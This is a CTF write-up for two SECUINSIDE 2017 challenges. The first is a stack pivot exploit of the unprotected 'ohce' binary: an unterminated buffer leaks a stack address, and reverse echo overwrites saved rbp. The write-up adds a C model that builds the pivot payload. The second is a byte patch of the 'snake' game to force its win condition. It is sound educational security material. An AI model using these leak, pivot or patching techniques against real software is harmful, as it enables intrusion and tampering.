20170701_SECUINSIDECTF Writeup

Yesterday and today I took part in 20170701_SECUINSIDECTF. There were many difficult problems, and some I could not solve.

Fortunately, I solved two problems, OHCE and SNAKE. My solutions are written up below.

OHCE pwn


This is a stack-based overflow challenge. The program works as follows.


– First it prints a menu, and I can choose 1. echo, 2. reverse echo, or 3. exit.

– If I choose 1, I can type something and it echoes it back.

– If I choose 2, I can type something and it returns the string I typed, reversed.

– If I choose 3, the program exits.


Let’s analyze it. checksec shows that the binary has no protections at all:


$ checksec ohce
[*] '/mnt/hgfs/VM-Share/20170701_SECUINSIDECTF/ohce/ohce'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE


Next I kept running it, and after several minutes I found a null-byte termination vulnerability: the input buffer is not NUL-terminated, so reading it back as a string runs into the data that follows it.

If I input 31+32*n characters in echo mode, the data after the buffer is leaked. When I input the same thing in reverse echo mode, the program crashes.

1. echo
2. echo(Reverse)
3. Exit
> 1
1. echo
2. echo(Reverse)
3. Exit
> 2
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaSegmentation fault (core dumped)


What happened? The picture below shows the stack after inputting 31+32*n characters.

(In this picture, unfortunately, the data at 0x7fffffffdae0 is 00, so the leak does not occur here…)



Then in reverse echo mode, because of the same null-byte termination vulnerability, the reversal also writes past the buffer and I can overwrite the next address on the stack.

Finally, the overwritten value is loaded into rsp by [0x400268 mov rsp,rbp] in the epilogue, so the following ret pops rip from memory I control and I get rip.


The exploitation steps are:

– First, leak a stack address by writing 31 characters in echo mode.

– Next, in echo mode, write many characters followed by the stack address that points to the shellcode (the address in the red rectangle).

– Finally, in reverse echo mode, write the shellcode and the stack address to pivot to (the address in the light blue rectangle).



$ python solve_ohce.py
[+] Opening connection to on port 8888: Done
\x001. echo
2. echo(Reverse)
3. Exit\x00
\x00 >
[*] Switching to interactive mode
$ ls
$ cat flag
[*] Got EOF while reading in interactive
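The two bugs described above, modelled in C as an added example. This is not the challenge binary and not the solve_ohce.py script from this writeup: the 32-byte buffer, the struct that stands in for the stack layout, the saved-rbp values and the epilogue `mov rsp, rbp ; pop rbp ; ret` are all assumptions chosen so the behaviour is deterministic. It shows why a full buffer leaks the six significant bytes of the adjacent pointer, how reversing that "string" in place drops attacker bytes into the saved rbp slot, and why a target address containing a 00 byte cannot be delivered this way (the same limitation the picture above ran into).

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the challenge binary: a deterministic model of the two
 * ohce bugs. In the real program the "next data" is whatever follows the
 * input buffer on the stack; here it is an explicit field so the layout is
 * fixed. BUF_SIZE, the saved-rbp values and the epilogue are assumptions. */
#define BUF_SIZE   32
#define ADDR_BYTES 6      /* canonical user-space address: 2 high bytes are 0 */

struct frame {
    char     buf[BUF_SIZE];  /* no byte reserved for the terminator */
    uint64_t saved_rbp;      /* the slot `mov rsp, rbp ; ... ret` pivots through */
    uint64_t saved_rip;
};

struct model_result {
    size_t   walked;         /* bytes printf("%s") walks after a full echo */
    uint64_t leak;           /* pointer recovered from the over-read */
    uint64_t pivoted_rbp;    /* saved_rbp after the reverse-echo corruption */
};

/* Bug 1 (echo): copy the input and print it as a C string. A full-length
 * input gets no terminator, so strlen() walks into saved_rbp and stops at
 * its first zero byte. strlen() is taken over the whole object, as the real
 * program effectively does, not over buf's declared bound. */
static size_t echo(struct frame *f, const char *in, size_t n)
{
    if (n > BUF_SIZE)
        n = BUF_SIZE;
    memcpy(f->buf, in, n);
    if (n < BUF_SIZE)
        f->buf[n] = '\0';        /* terminated only when there is room */
    return strlen((const char *)f);
}

/* Read the ADDR_BYTES bytes the over-read exposed right after buf. */
static uint64_t leaked_pointer(const struct frame *f)
{
    uint64_t v = 0;
    memcpy(&v, (const unsigned char *)f + BUF_SIZE, ADDR_BYTES);  /* little-endian */
    return v;
}

/* Bug 2 (reverse echo): reverse the "string" in place. With the same
 * unterminated buffer the string spans buf plus the low ADDR_BYTES of
 * saved_rbp, so the swap moves the first ADDR_BYTES input bytes into
 * saved_rbp (in reverse order) and the old pointer bytes to the front. */
static void reverse_echo(struct frame *f)
{
    char *s = (char *)f;
    size_t len = strlen(s);
    if (len == 0)
        return;
    for (size_t i = 0, j = len - 1; i < j; i++, j--) {
        char t = s[i];
        s[i] = s[j];
        s[j] = t;
    }
}

/* Build the reverse-echo payload that leaves `target` in saved_rbp: the six
 * significant bytes go at the start in big-endian order, because the
 * reversal flips them into the little-endian slot. Returns 0 if the target
 * has a zero byte there: a NUL would end the string early and the pivot
 * would not land. */
static int build_pivot_payload(uint64_t target, char out[BUF_SIZE])
{
    memset(out, 'A', BUF_SIZE);
    for (int i = 0; i < ADDR_BYTES; i++) {
        uint8_t b = (uint8_t)(target >> (8 * (ADDR_BYTES - 1 - i)));
        if (b == 0)
            return 0;
        out[i] = (char)b;
    }
    return 1;
}

/* Run the model: leak with echo, then pivot saved_rbp with reverse echo.
 * After the assumed epilogue (`mov rsp, rbp ; pop rbp ; ret`) rsp would be
 * `target`, so `ret` would pop rip from memory the attacker filled. */
struct model_result run_model(uint64_t real_rbp, uint64_t target)
{
    struct model_result r = {0, 0, 0};
    struct frame f;
    char in[BUF_SIZE];

    memset(&f, 0, sizeof f);
    f.saved_rbp = real_rbp;
    f.saved_rip = 0x401234;         /* placeholder, not used by the model */

    memset(in, 'A', BUF_SIZE);
    r.walked = echo(&f, in, BUF_SIZE);   /* 32 + ADDR_BYTES */
    r.leak = leaked_pointer(&f);         /* == real_rbp */

    if (build_pivot_payload(target, in)) {
        echo(&f, in, BUF_SIZE);     /* still unterminated */
        reverse_echo(&f);           /* corrupts saved_rbp */
    }
    r.pivoted_rbp = f.saved_rbp;
    return r;
}

int main(void)
{
    struct model_result r = run_model(0x7fffffffdae0ULL, 0x7fffffffdaf8ULL);
    printf("echo walked %zu bytes, leaked 0x%" PRIx64 ", saved_rbp now 0x%" PRIx64 "\n",
           r.walked, r.leak, r.pivoted_rbp);
    return 0;
}
```

The byte-order detail matters in practice: whatever goes into the adjacent slot arrives reversed, so the address (or, in a real exploit, any data that must survive the reversal) has to be written back to front. The zero-byte check is the practical caveat, since a stack address whose low six bytes include 00 cannot be pivoted to with a single reverse-echo.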



SNAKE

This is an old snake game program.

After several hours of investigation, I worked out the algorithm shown below (the function names are mine).



The program computes enc_flag and XORs it with other data in the clear_game function.

At first I tried to write a script to generate that data, but I could not. So I changed direction as follows.


– I patched the program so that the if(judge_goal) condition is always true.




– I patched the program so that time_duration is never changed.



Then I ran it, and after several minutes I got the flag. (You must keep the snake from crashing into a wall until the flag appears.)
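One way to carry out the two patches above, as an added example that is not the patch from this writeup: a verify-then-patch helper in C run against a constructed byte buffer standing in for the file image. The file offsets (0x10 and 0x30), the original bytes at them and the RIP-relative displacement of the time_duration global are assumptions for illustration; the real ones come from the disassembler. The first patch makes judge_goal return true by overwriting its entry with `mov eax, 1 ; ret`, the second NOPs out the instruction that updates time_duration, and both refuse to write unless the bytes already there match what was expected.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the writeup's actual patch. Offsets, original bytes and
 * the global's displacement are assumptions. x86-64 encodings used:
 *   b8 imm32      mov eax, imm32
 *   c3            ret
 *   90            nop
 *   01 05 disp32  add [rip+disp32], eax */
#define IMAGE_LEN      64
#define JUDGE_GOAL_OFF 0x10   /* assumed file offset of judge_goal() */
#define TIME_STORE_OFF 0x30   /* assumed file offset of the time_duration update */

/* Assumed original bytes: judge_goal starts with push rbp ; mov rbp, rsp ;
 * sub rsp, 0x20, and the update is add [rip+0x2f10], eax. */
static const uint8_t judge_goal_prologue[8] = {0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20};
static const uint8_t time_store[6]          = {0x01, 0x05, 0x10, 0x2f, 0x00, 0x00};

uint8_t sample_image[IMAGE_LEN];   /* constructed stand-in for the binary */

/* Overwrite n bytes at off only if the bytes there match expect. Returns 1
 * on success, 0 if the image is not what was assumed (wrong build, wrong
 * offset) so a bad patch is never written. */
int patch_bytes(uint8_t *img, size_t img_len, size_t off,
                const uint8_t *expect, const uint8_t *repl, size_t n)
{
    if (off > img_len || n > img_len - off)
        return 0;
    if (memcmp(img + off, expect, n) != 0)
        return 0;
    memcpy(img + off, repl, n);
    return 1;
}

/* Patch 1: make a function return true unconditionally by overwriting its
 * first 6 bytes with mov eax, 1 ; ret. Leftover prologue bytes after the
 * ret are never executed. */
int patch_return_true(uint8_t *img, size_t img_len, size_t func_off,
                      const uint8_t *expect_prologue)
{
    static const uint8_t ret_true[6] = {0xb8, 0x01, 0x00, 0x00, 0x00, 0xc3};
    return patch_bytes(img, img_len, func_off, expect_prologue, ret_true, sizeof ret_true);
}

/* Patch 2: replace an n-byte instruction with n one-byte NOPs so the store
 * to the global never happens. n must be the exact instruction length or
 * the following instruction is mis-decoded. */
int patch_nop(uint8_t *img, size_t img_len, size_t off,
              const uint8_t *expect, size_t n)
{
    uint8_t nops[16];
    if (n > sizeof nops)
        return 0;
    memset(nops, 0x90, n);
    return patch_bytes(img, img_len, off, expect, nops, n);
}

/* Fill the stand-in image: int3 padding with the two sequences in place. */
void build_sample_image(uint8_t *img, size_t img_len)
{
    memset(img, 0xcc, img_len);
    memcpy(img + JUDGE_GOAL_OFF, judge_goal_prologue, sizeof judge_goal_prologue);
    memcpy(img + TIME_STORE_OFF, time_store, sizeof time_store);
}

/* Apply both SNAKE patches. Returns how many were applied: 2 on a pristine
 * image, 0 on one already patched, since the expected bytes are gone. */
int apply_snake_patches(uint8_t *img, size_t img_len)
{
    int applied = 0;
    applied += patch_return_true(img, img_len, JUDGE_GOAL_OFF, judge_goal_prologue);
    applied += patch_nop(img, img_len, TIME_STORE_OFF, time_store, sizeof time_store);
    return applied;
}

/* Build the sample image in the global buffer and patch it; returns the count. */
int patch_sample_image(void)
{
    build_sample_image(sample_image, sizeof sample_image);
    return apply_snake_patches(sample_image, sizeof sample_image);
}

int main(void)
{
    int n = patch_sample_image();
    printf("%d patches applied; judge_goal now starts %02x ... %02x, time store byte %02x\n",
           n, sample_image[JUDGE_GOAL_OFF], sample_image[JUDGE_GOAL_OFF + 5],
           sample_image[TIME_STORE_OFF]);
    return 0;
}
```

Against a real file the image would be read from disk and written back after patching; checking the expected bytes first is what keeps the same script from silently corrupting a different build or a file that was already patched.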





Patched program:



